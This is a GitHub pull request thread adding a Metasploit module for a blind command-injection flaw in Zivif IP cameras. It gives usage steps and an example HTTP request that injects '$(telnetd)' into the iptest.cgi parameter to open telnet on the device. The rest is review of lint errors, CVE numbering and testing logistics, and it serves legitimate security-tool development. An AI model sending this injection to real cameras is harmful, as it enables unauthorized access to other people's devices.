Added exploit for CVE-2017-17106

[silascutler]

Vulnerable Application
Zivif is a brand of consumer IP cameras. Version 2.3.4.2103 and prior are vulnerable to a remote command execution vulnerability - documented in CVE-2017-171069

This module exploits the RCE vulnerability in the web interface of these IP cameras. This is a blind RCE and the results of the command are not returned to the attacker.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/unix/http/zivif_ipcheck_exec
• set RHOSTS <rhost>
• set PAYLOAD cmd/unix/generic
• set CMD <command>
• exploit

In testing - for validation, the running reboot as the issued <command> is a good way to do a quick validation. Alternatively, using telnetd will start Telnet on the vulnerable device.

An example HTTP request from this module is:

GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%24%28telnetd%29 HTTP/1.1
Host: <TARGET>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded

[bwatters-r7]

Tests are failing for the following:

modules/exploits/unix/http/zivif_ipcheck_exec.rb - [ERROR] Incorrect disclosure date format
modules/exploits/unix/http/zivif_ipcheck_exec.rb:16 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:33 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:54 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:63 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:64 - [WARNING] Spaces at EOL

[gwillcox-r7]

@silascutler Looking online to try source this camera. I can see that there are newer models however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module as CVE-2017-171069 is not a valid CVE identifier, however CVE-2017-17106 is and this is the one used in your PR title.

Looking around I can't see anyone selling this camera on Amazon and the only people selling the older versions of these cameras I could find was on EBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.

Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).

[label-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[label-actions]

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.

To help unblock this pull request, please:

• Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
• Or comment guided steps on how to set up our environment for testing this module
• Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com

Once there's a clear path for testing and evaluating this module, we can progress with this further.

[silascutler]

@silascutler Looking online to try source this camera. I can see that there are newer models however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module as CVE-2017-171069 is not a valid CVE identifier, however CVE-2017-17106 is and this is the one used in your PR title.

I think the correct CVE should actually be CVE-2017-17105 - which covers the remote command injection (https://nvd.nist.gov/vuln/detail/CVE-2017-17105).

Looking around I can't see anyone selling this camera on Amazon and the only people selling the older versions of these cameras I could find was on EBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.

Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).

Yep PR115 is still vulnerable. Also https://www.amazon.com/gp/product/B06Y5VTWC9/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1 . I also just ordered https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=zivif&qid=1589308250&s=electronics&sr=1-1 to verify on that device as well.

The original documentation of the exploit can be found: https://seclists.org/fulldisclosure/2017/Dec/42

[gwillcox-r7]

@silascutler Looking online to try source this camera. I can see that there are newer models however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module as CVE-2017-171069 is not a valid CVE identifier, however CVE-2017-17106 is and this is the one used in your PR title.

I think the correct CVE should actually be CVE-2017-17105 - which covers the remote command injection (https://nvd.nist.gov/vuln/detail/CVE-2017-17105).

Looking around I can't see anyone selling this camera on Amazon and the only people selling the older versions of these cameras I could find was on EBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.
Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).

Yep PR115 is still vulnerable. Also https://www.amazon.com/gp/product/B06Y5VTWC9/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1 . I also just ordered https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=zivif&qid=1589308250&s=electronics&sr=1-1 to verify on that device as well.

The original documentation of the exploit can be found: https://seclists.org/fulldisclosure/2017/Dec/42

Hmm can't find any PR115's available online. The first link you posted on Amazon shows that they are out of stock but the second one might be interesting if it is still vulnerable as it seems those are still being sold.

[agalway-r7]

@silascutler, we won't able to get a camera that can test the module for a while, especially with COVID on the go. Would you be ok to either send us a Packet Capture of the module's successful execution, or hop on a call with myself and Demo it? Eithers good, so whatever suits you best.

[silascutler]

@silascutler, we won't able to get a camera that can test the module for a while, especially with COVID on the go. Would you be ok to either send us a Packet Capture of the module's successful execution, or hop on a call with myself and Demo it? Eithers good, so whatever suits you best.

Yes- I'll email you

[agalway-r7]

@silascutler, do you have the module set to executable on your machine? Getting a Module should not be executable (+x) error on the Travis build

[silascutler]

@silascutler, do you have the module set to executable on your machine? Getting a Module should not be executable (+x) error on the Travis build

I have the local repo on a shared drive. I think it's not properly preserving the flag

[silascutler]

Updated PR based on feedback.

[silascutler]

Fixed for travis-ci

[agalway-r7]

Looks good, will land it ASAP. Good work @silascutler 👍

[agalway-r7]

Release Notes

The Zivif Camera iptest.cgi Blind Remote Command Execution module exploits a vulnerability in the Web Interface of Zivif brand IP cameras of version 2.3.4.2103 and below, facilitating blind RCE.